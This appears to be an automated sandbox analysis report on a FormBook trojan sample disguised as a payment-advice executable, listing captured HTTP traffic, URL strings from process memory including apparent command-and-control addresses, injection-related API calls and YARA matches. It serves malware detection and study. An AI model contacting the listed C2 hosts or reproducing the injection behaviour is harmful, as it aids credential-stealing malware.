23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:36 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:42 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hnb5xHf90hZxJkJDfW%2B52BoxkAeQBb75kdlvCMy4QBICfjepzilPOnSN6ytLc2HzauLLKhcrCvQZyqP89xySCM73WIswB2utuTIiVdHU720CB4Py0MoXAqfbiUQ6lYnBqPs%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d051fe14b1c0dc7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5xnBmf266scKHJGfxVtHuRnMp1F7fLdWZfKhKAWfxmVjC3NJGOAWYxy0FGzOFBPgJ8z2N%2BX2n5VbY5LPoY%2BFBklPcNYMW5OTBdDiPHUHq3Cwo%2B1neitaTzQOWriK%2FYpM3qWC6g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d051ff12e2a42f7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BBRvmjHAN5uH7z1Uwmb7cCpp0dAsup%2BoiR5QVx1znMUTyTwnj20dEnKwO63VGQwjJ2sEzFLI0IndB27tB2j33%2FPEa%2BjkCJB96e6tbxO9qpCa0yKtKS5bGS2hZu%2FQEFHotHYXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d052001491a8c3c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 08:08:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FFpYnTOZs%2F4Qz4Uny3QpIRrvSdA2JgPRyNMrXSO1hwkZFKdnLJgY%2BqojIQr6cDDMmjWOlPoabOqxqA%2BxN7%2FwapVD4dw%2Bwmu3d%2F8S8uvIufirwB2RV8JR5x16LYicK1p4NTmHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d0520110b546a53-EWRalt-svc: h3=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 08:09:01 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a7679f-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: NETSTAT.EXE, 00000006.00000002.2960171619.00000000044C6000.00000004.10000000.00040000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000002.2959969175.00000000035D6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2687690315.000000001AA26000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chalet-tofane.net:80/w5h3/?xNv=1SmCwmpOaIYJfuspvbmYENxQiVuKofAafkRqArhwQnoekPS2kKO
            Source: eYlgnnKYnAjqSS.exe, 00000007.00000002.2959379992.00000000011FD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wcq24.top
            Source: eYlgnnKYnAjqSS.exe, 00000007.00000002.2959379992.00000000011FD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wcq24.top/4jol/
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: NETSTAT.EXE, 00000006.00000002.2958501115.000000000319A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: NETSTAT.EXE, 00000006.00000003.2573878497.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: NETSTAT.EXE, 00000006.00000003.2581601481.000000000834D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: PAYMENT ADVISE#9879058.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CA53 NtClose,1_2_0042CA53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B60 NtClose,LdrInitializeThunk,1_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,1_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774340 NtSetContextThread,1_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774650 NtSuspendThread,1_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BF0 NtAllocateVirtualMemory,1_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BE0 NtQueryValueKey,1_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BA0 NtEnumerateValueKey,1_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B80 NtQueryInformationFile,1_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AF0 NtWriteFile,1_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AD0 NtReadFile,1_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AB0 NtWaitForSingleObject,1_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F60 NtCreateProcessEx,1_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F30 NtCreateSection,1_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FE0 NtCreateFile,1_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FB0 NtResumeThread,1_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FA0 NtQuerySection,1_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F90 NtProtectVirtualMemory,1_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E30 NtWriteVirtualMemory,1_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EE0 NtQueueApcThread,1_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EA0 NtAdjustPrivilegesToken,1_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E80 NtReadVirtualMemory,1_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D30 NtUnmapViewOfSection,1_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D10 NtMapViewOfSection,1_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D00 NtSetInformationFile,1_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DD0 NtDelayExecution,1_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DB0 NtEnumerateKey,1_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C60 NtCreateKey,1_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C00 NtQueryInformationProcess,1_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CF0 NtOpenProcess,1_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CC0 NtQueryVirtualMemory,1_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CA0 NtQueryInformationToken,1_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773010 NtOpenDirectoryObject,1_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773090 NtSetValueKey,1_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037739B0 NtGetContextThread,1_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D70 NtOpenThread,1_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D10 NtOpenProcessToken,1_2_03773D10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03994340 NtSetContextThread,LdrInitializeThunk,6_2_03994340
